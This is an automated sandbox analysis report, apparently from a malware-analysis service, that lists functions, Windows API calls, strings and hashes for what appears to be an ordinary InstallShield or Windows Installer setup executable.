                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          • _memset.LIBCMT ref: 0042257E
                                                                                                                                                                          • _memset.LIBCMT ref: 00422599
                                                                                                                                                                            • Part of subcall function 00440126: lstrcpyW.KERNEL32 ref: 00440164
                                                                                                                                                                            • Part of subcall function 00440126: lstrcpyW.KERNEL32 ref: 0044016C
                                                                                                                                                                            • Part of subcall function 00440126: _malloc.LIBCMT ref: 00440186
                                                                                                                                                                            • Part of subcall function 00440126: _memset.LIBCMT ref: 00440197
                                                                                                                                                                            • Part of subcall function 00440126: _memset.LIBCMT ref: 004401C2
                                                                                                                                                                            • Part of subcall function 00440126: wsprintfW.USER32 ref: 00440214
                                                                                                                                                                            • Part of subcall function 00440126: _memset.LIBCMT ref: 0044022C
                                                                                                                                                                            • Part of subcall function 00440CE4: lstrcpyW.KERNEL32 ref: 00440D1D
                                                                                                                                                                            • Part of subcall function 00440CE4: lstrcpyW.KERNEL32 ref: 00440D27
                                                                                                                                                                            • Part of subcall function 00440CE4: _swscanf.LIBCMT ref: 00440D9C
                                                                                                                                                                            • Part of subcall function 00440CE4: _swscanf.LIBCMT ref: 00440DC5
                                                                                                                                                                          • __wfullpath.LIBCMT ref: 004226EC
                                                                                                                                                                            • Part of subcall function 0043FBF3: __EH_prolog3_GS.LIBCMT ref: 0043FBFD
                                                                                                                                                                            • Part of subcall function 0043FBF3: wsprintfW.USER32 ref: 0043FC3F
                                                                                                                                                                            • Part of subcall function 0043FBF3: wvsprintfW.USER32(?,?,00000000), ref: 0043FC5A
                                                                                                                                                                          Strings
                                                                                                                                                                          • ScriptDriven, xrefs: 004224FC
                                                                                                                                                                          • Startup, xrefs: 00422519
                                                                                                                                                                          • HsG, xrefs: 004224A1
                                                                                                                                                                          • 4.05.0.0, xrefs: 004225B7
                                                                                                                                                                          • Windows Installer 4.5 or newer is required to run this installation but is not present on the machine. Setup will now exit., xrefs: 00422619
                                                                                                                                                                          • msiaction.cpp, xrefs: 004225FC
                                                                                                                                                                          • Msi.DLL, xrefs: 004225A9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast_memset$lstrcpy$H_prolog3_$FreeString_swscanfwsprintf$H_prolog3_catch___wfullpath_mallocwvsprintf
                                                                                                                                                                          • String ID: 4.05.0.0$HsG$Msi.DLL$ScriptDriven$Startup$Windows Installer 4.5 or newer is required to run this installation but is not present on the machine. Setup will now exit.$msiaction.cpp
                                                                                                                                                                          • API String ID: 566702958-3432014048
                                                                                                                                                                          • Opcode ID: fcde2ecf36e626801b94e16a626954dea1268674b33742f80287f6dfbd65f663
                                                                                                                                                                          • Instruction ID: e1a2aad2503cfae28dd439aa769bfc125dd6cf0a037798f186362dfce8e74fae
                                                                                                                                                                          • Opcode Fuzzy Hash: fcde2ecf36e626801b94e16a626954dea1268674b33742f80287f6dfbd65f663
                                                                                                                                                                          • Instruction Fuzzy Hash: E871C371A01168AAEF20D760CD95FEEB778AB44308F4041EBE509B61C1DFB85B89CF59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00426871, Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 184COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Installer, xrefs: 00426B08
                                                                                                                                                                          • Startup, xrefs: 00426918
                                                                                                                                                                          • DotNetDelayReboot, xrefs: 004268FB
                                                                                                                                                                          • System is Win9x or reboot is not being suppressed, reboot will be immediate, xrefs: 00426A8E
                                                                                                                                                                          • msiaction.cpp, xrefs: 00426983, 004269DB, 00426A6E
                                                                                                                                                                          • InstallerLocation, xrefs: 00426B4B
                                                                                                                                                                          • Redist return value (%d) indicates a reboot is required, DotNetDelayReboot is %x, xrefs: 0042697D
                                                                                                                                                                          • Reboot will be deferred, xrefs: 004269FB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentDirectoryH_prolog3__memset
                                                                                                                                                                          • String ID: DotNetDelayReboot$InstallerLocation$Reboot will be deferred$Redist return value (%d) indicates a reboot is required, DotNetDelayReboot is %x$Software\Microsoft\Windows\CurrentVersion\Installer$Startup$System is Win9x or reboot is not being suppressed, reboot will be immediate$msiaction.cpp
                                                                                                                                                                          • API String ID: 277675003-2561541245
                                                                                                                                                                          • Opcode ID: dfd16fa2cd39d483b21b1d9c7cdb9ccfd438fe874de06ac59044d39ddfe285eb
                                                                                                                                                                          • Instruction ID: f2c2c43573c966db099732116d9ce63b58c9502003dbe7f4726a2a704f6d60ff
                                                                                                                                                                          • Opcode Fuzzy Hash: dfd16fa2cd39d483b21b1d9c7cdb9ccfd438fe874de06ac59044d39ddfe285eb
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E817070901228AEEF64EB60CC89BDD7774AB14304F5041EAE50DB61E1DBB85FC9CB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043FD5A, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 179filelibraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043FD64
                                                                                                                                                                            • Part of subcall function 004594FD: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C), ref: 00459510
                                                                                                                                                                            • Part of subcall function 004594FD: GetProcAddress.KERNEL32(00000000), ref: 00459517
                                                                                                                                                                            • Part of subcall function 004594FD: GetCurrentProcess.KERNEL32(00000000,?,?,0043FD91,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?,0000000C,0000000C,?), ref: 00459527
                                                                                                                                                                          • CreateFileW.KERNEL32(00000015,80000000,00000001,00000000,00000003,00000080,00000000,000000BC,00420FE2,?,0047C4E4,00000000,?,?,?,?), ref: 0043FDBF
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 0043FDFF
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0043FE06
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressErrorFreeHandleLastModuleProcString$CreateCurrentFileH_prolog3H_prolog3_Process
                                                                                                                                                                          • String ID: Corrected file path: new path is '%s' (was this on localappdata in system context? old: '%s')$GetFinalPathNameByHandleW$HsG$HsG$\\?\$kernel32.dll$utils.cpp
                                                                                                                                                                          • API String ID: 2316756493-59786746
                                                                                                                                                                          • Opcode ID: 28c5848bd6dcf686af964ccd665d3da7da6b158d9a02d32b8071fae2b27b2dbb
                                                                                                                                                                          • Instruction ID: f137a8aa17e39c14183c5b1b06e9384378b43606c9e0dba753352061d6d4e362
                                                                                                                                                                          • Opcode Fuzzy Hash: 28c5848bd6dcf686af964ccd665d3da7da6b158d9a02d32b8071fae2b27b2dbb
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B716E70E04318EEDB20DB64CC95BDEB7B8AF05308F1040AEE449B7191DB785A89CF5A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043EB86, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 154filestringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043EB90
                                                                                                                                                                          • _memset.LIBCMT ref: 0043EBC3
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00000104), ref: 0043EBDD
                                                                                                                                                                            • Part of subcall function 0043D68F: __EH_prolog3_GS.LIBCMT ref: 0043D696
                                                                                                                                                                            • Part of subcall function 0043D68F: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0043D743
                                                                                                                                                                            • Part of subcall function 0043D68F: GetLastError.KERNEL32 ref: 0043D751
                                                                                                                                                                          • _memset.LIBCMT ref: 0043EC0A
                                                                                                                                                                            • Part of subcall function 0043F956: __EH_prolog3_GS.LIBCMT ref: 0043F95D
                                                                                                                                                                          • _memset.LIBCMT ref: 0043EC55
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,?), ref: 0043EC69
                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,0047D474,00000000,?,?,?,?,?,?,?,?,?), ref: 0043EC83
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00414B0D: __EH_prolog3.LIBCMT ref: 00414B14
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 0043ED04
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,?,00483E18,?,?,00000000,00000000), ref: 0043EDC0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$ErrorH_prolog3_Last_memset$FreeH_prolog3NameStringTemp$CreateDeleteModulePathlstrcpy
                                                                                                                                                                          • String ID: xLJ$|LJ
                                                                                                                                                                          • API String ID: 1036951016-2420951575
                                                                                                                                                                          • Opcode ID: 7acba02279babadea242a8776319000df87353446d1dc829f67f887ee61a3afc
                                                                                                                                                                          • Instruction ID: b63d76af35cdce9b462fb1661a0711746e3e8756b048c7b80ece83019c61647f
                                                                                                                                                                          • Opcode Fuzzy Hash: 7acba02279babadea242a8776319000df87353446d1dc829f67f887ee61a3afc
                                                                                                                                                                          • Instruction Fuzzy Hash: 07513E71C0111CAADB60EBA1DC85ADE7779AF59304F0001EAF50DA30A1EB785F99CF69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004405F1, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 132processwindowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004405FB
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                          • _memset.LIBCMT ref: 00440623
                                                                                                                                                                          • _memset.LIBCMT ref: 00440634
                                                                                                                                                                          • CreateProcessW.KERNEL32 ref: 004406BF
                                                                                                                                                                          • PeekMessageW.USER32 ref: 004406F1
                                                                                                                                                                          • MsgWaitForMultipleObjects.USER32 ref: 00440716
                                                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 00440723
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000001,000000B8,004214B3,?,00000001), ref: 00440734
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastProcess_memset$CloseCodeCreateExitH_prolog3_HandleMessageMultipleObjectsPeekWait
                                                                                                                                                                          • String ID: Attempting to launch: %s$Launch result %d, exit code %d$utils.cpp
                                                                                                                                                                          • API String ID: 3068613049-2353317557
                                                                                                                                                                          • Opcode ID: e952755842ced4ed8b3adf6eb4d735546a946b3ed5e15eb7774fa6f2e5511f4e
                                                                                                                                                                          • Instruction ID: 7cb4e8b9f22bfe05b51561b9d39bc594a8625d651e35bb7465fc5ecf3ed391ee
                                                                                                                                                                          • Opcode Fuzzy Hash: e952755842ced4ed8b3adf6eb4d735546a946b3ed5e15eb7774fa6f2e5511f4e
                                                                                                                                                                          • Instruction Fuzzy Hash: D7414CB1C00208AEEB10DBE4CD85DEEBBBCEF04349F11416AE606AB291D6745E45CF69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0044077D, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 88windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 0044078D
                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 004407D1
                                                                                                                                                                          • PeekMessageW.USER32 ref: 0044083A
                                                                                                                                                                          • MsgWaitForMultipleObjects.USER32 ref: 00440852
                                                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 00440863
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00440874
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCodeExecuteExitHandleMessageMultipleObjectsPeekProcessShellWait_memset
                                                                                                                                                                          • String ID: <$@
                                                                                                                                                                          • API String ID: 116963689-1426351568
                                                                                                                                                                          • Opcode ID: 08be47c9ecb5fca84a94bbea71ca93b9555c964724dcd3555beb553d33e5ce76
                                                                                                                                                                          • Instruction ID: 916f66e611874592a9ef8bfbfb301ef077d9ce64854e67df2fb9cca157ceb2ee
                                                                                                                                                                          • Opcode Fuzzy Hash: 08be47c9ecb5fca84a94bbea71ca93b9555c964724dcd3555beb553d33e5ce76
                                                                                                                                                                          • Instruction Fuzzy Hash: 90311671D00209EFEF10DFE4C988ADEBBB9FB08344F10406AEA05A6250E7799E54DB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00401A20, Relevance: 18.2, APIs: 12, Instructions: 160fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                          • CreateFileW.KERNEL32(-00000004,C0000000,00000001,00000000,00000004,00000080,00000000,?,?,00000001,CC858012), ref: 00401A86
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000001,CC858012), ref: 00401A99
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401AB5
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401AC0
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00401AE0
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000002,00000000,00000000), ref: 00401B18
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000002,?), ref: 00401B5B
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00401B92
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401BB3
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401BC9
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401BD4
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00401BF4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FileFreeString$Write$CreateRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2306213392-0
                                                                                                                                                                          • Opcode ID: d1ece2afd3369510254341ddc9284f3d1996fb4c1dc89304be5549a346bdd64c
                                                                                                                                                                          • Instruction ID: 797739fed59da5084f6b06860876438e6c6dd135b8293a77f3c8103bba1d7987
                                                                                                                                                                          • Opcode Fuzzy Hash: d1ece2afd3369510254341ddc9284f3d1996fb4c1dc89304be5549a346bdd64c
                                                                                                                                                                          • Instruction Fuzzy Hash: 07512770A00248AFEB10DFA4DC49BADBBB9FF05704F654029E514B72A1DB79A948CF58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00419BF5, Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 386COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00419BFF
                                                                                                                                                                            • Part of subcall function 00419A17: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000001,00000000,?,00000008,00000000,?,0040D7F7,000000FF,?), ref: 00419A3A
                                                                                                                                                                            • Part of subcall function 00419AD9: GetFileSize.KERNEL32(?,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419AF2
                                                                                                                                                                            • Part of subcall function 00419AD9: GetProcessHeap.KERNEL32(00000008,00000001,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B13
                                                                                                                                                                            • Part of subcall function 00419AD9: HeapAlloc.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B1A
                                                                                                                                                                            • Part of subcall function 00419AD9: ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF), ref: 00419B38
                                                                                                                                                                            • Part of subcall function 00419AD9: _strlen.LIBCMT ref: 00419B47
                                                                                                                                                                            • Part of subcall function 00419AD9: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B7C
                                                                                                                                                                            • Part of subcall function 00419AD9: HeapFree.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B83
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$File$Process$AllocCreateFreeH_prolog3_ReadSize_strlen
                                                                                                                                                                          • String ID: $$jG$,jG$@jG$DjG$DjG$HjG$HjG$LjG
                                                                                                                                                                          • API String ID: 3764712436-4090182768
                                                                                                                                                                          • Opcode ID: a5594073b342ac47d8d757e19e9cc0c1e979dc4fd6785f5f86a661262f8fa685
                                                                                                                                                                          • Instruction ID: 6a29706e4c3a97baef7a76b9afd65b7de9abaad9e18291812e22ad97b46dfff5
                                                                                                                                                                          • Opcode Fuzzy Hash: a5594073b342ac47d8d757e19e9cc0c1e979dc4fd6785f5f86a661262f8fa685
                                                                                                                                                                          • Instruction Fuzzy Hash: 23F16A70901258EEDB20EFA9CC95BDEBBB8AF05304F5041AEE009B7281DB741E89CF55
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00405620, Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 378COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _memmove.LIBCMT ref: 00405723
                                                                                                                                                                          • _memmove.LIBCMT ref: 0040575C
                                                                                                                                                                          • _memmove.LIBCMT ref: 00405799
                                                                                                                                                                          • _memmove.LIBCMT ref: 00405996
                                                                                                                                                                            • Part of subcall function 00406350: SysAllocStringLen.OLEAUT32(00000000,?), ref: 00406399
                                                                                                                                                                            • Part of subcall function 00406350: _memmove.LIBCMT ref: 004063C1
                                                                                                                                                                            • Part of subcall function 00406350: SysFreeString.OLEAUT32(00000000), ref: 004063D1
                                                                                                                                                                          • _memmove.LIBCMT ref: 00405816
                                                                                                                                                                          • _memmove.LIBCMT ref: 0040589A
                                                                                                                                                                          • _memmove.LIBCMT ref: 00405917
                                                                                                                                                                          • _memmove.LIBCMT ref: 0040595A
